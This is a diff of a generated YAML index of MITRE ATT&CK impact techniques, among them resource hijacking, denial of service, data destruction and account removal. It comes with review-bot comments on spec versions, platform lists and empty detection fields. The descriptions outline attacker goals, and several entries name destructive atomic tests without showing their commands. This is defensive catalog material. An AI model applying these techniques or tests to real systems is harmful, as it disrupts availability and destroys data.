+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
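Review bot: T1491.001 keeps `x_mitre_attack_spec_version: 2.1.0` (the unchanged context line at the top of this hunk) while only its `spec_version` is removed, so it ends up on a different spec version than the objects bumped to 3.2.0 in this same diff; worth checking that this is really what the upstream bundle says. The new T1496.004 and T1496.001 objects both carry `x_mitre_detection: ''` and `atomic_tests: []`, whereas the parent T1496 has detection guidance (the process resource usage text visible further down). Anything that renders detection notes from this index will show nothing for the new sub-techniques; consider falling back to the parent's text in the consumer rather than patching the generated data.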
@@ -64224,11 +65203,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -64251,6 +65229,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -64268,9 +65247,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -64296,9 +65276,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests:
- name: Change User Password via passwd
@@ -64464,7 +65443,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
@@ -64488,7 +65467,6 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests:
- name: Encrypt files using 7z utility - macOS
@@ -64563,7 +65541,7 @@ impact:
elevation_required: false
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -64582,7 +65560,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -64599,18 +65576,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
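Review bot: In the T1499 platform list, `IaaS` is removed at one position and re-added after `Containers`, which is list reordering rather than a content change; the actual change is the removal of Azure AD, Office 365, SaaS and Google Workspace, the same pattern applied to T1498.002 and T1499.002 above. Keeping list order stable in the generator would leave only the real removals in the diff.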
@@ -64634,8 +65606,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -64655,33 +65627,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
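Review bot: The rewritten T1496 description enumerates four forms of resource hijacking (compute for cryptocurrency mining, selling bandwidth to proxy networks, generating SMS traffic for profit, abusing cloud messaging services), but this diff only adds the T1496.001, T1496.002 and T1496.004 sub-techniques; no T1496.003 object appears in the visible hunks, so please confirm the SMS-traffic sub-technique is added elsewhere in the file. The citations dropped from the old description (Kaspersky, CloudSploit, Unit 42, Trend Micro, GoBotKR, Sysdig Proxyjacking) match the `external_references` removed from T1496 in a later hunk and reappear under the new sub-techniques, so the reference set stays consistent.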
@@ -64692,7 +65653,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -64709,8 +65670,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
@@ -64729,39 +65693,14 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests:
- name: FreeBSD/macOS/Linux - Simulate CPU Load with Yes
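Review bot: The `atomic_tests` list for T1496 still carries the 'FreeBSD/macOS/Linux - Simulate CPU Load with Yes' test (unchanged context at the end of this hunk), while the new T1496.001 Compute Hijacking object added above has `atomic_tests: []`. With the parent's version bumped to 2.0 and its description reduced to an overview, a CPU-load test is a closer fit for T1496.001; consider re-homing it in a follow-up. Also, the new reference description reads 'Targeting GitLab .' with a space before the period; that comes from the upstream data and should be fixed there rather than hand-edited in this generated file.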
@@ -64779,62 +65718,61 @@ impact:
name: sh
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
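Review bot: `spec_version: '2.1'` is dropped from this technique object (the `- spec_version: '2.1'` line just above `atomic_tests: []`) and from every other technique block in this diff (T1485, T1498, T1495, T1490, T1529, T1133, T1195.001, T1566.002 and onward), while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0. `spec_version` is a required common property on STIX 2.1 objects, so any consumer that hands these `technique` maps to a STIX 2.1 parser or validator will now reject them. Please confirm the field is absent in the upstream bundle the generator read (rather than being stripped by the export) and state in the PR description that no downstream tooling depends on it.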
@@ -64843,7 +65781,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -64869,9 +65807,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
@@ -64927,7 +65866,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests:
- name: FreeBSD/macOS/Linux - Overwrite file with DD
@@ -64955,50 +65893,7 @@ impact:
name: sh
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -65013,6 +65908,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -65025,16 +65924,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
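Review bot: the T1498 platform list shrinks from nine entries (Windows, Azure AD, Office 365, SaaS, IaaS, Linux, macOS, Google Workspace, Containers in the removed block at the top of the T1498 section) to five (Windows, IaaS, Linux, macOS, Containers in the `+ x_mitre_platforms:` block here), with SaaS removed outright and Azure AD / Office 365 / Google Workspace removed without the `Identity Provider` / `Office Suite` replacements that T1566.002 and T1078.001 receive further down. That is plausible for a network-level DoS technique, but because the rest of this diff is a mechanical platform rename, please confirm the five-entry list matches the upstream bundle for this version rather than the generator dropping platforms it no longer recognises.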
@@ -65102,11 +66037,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
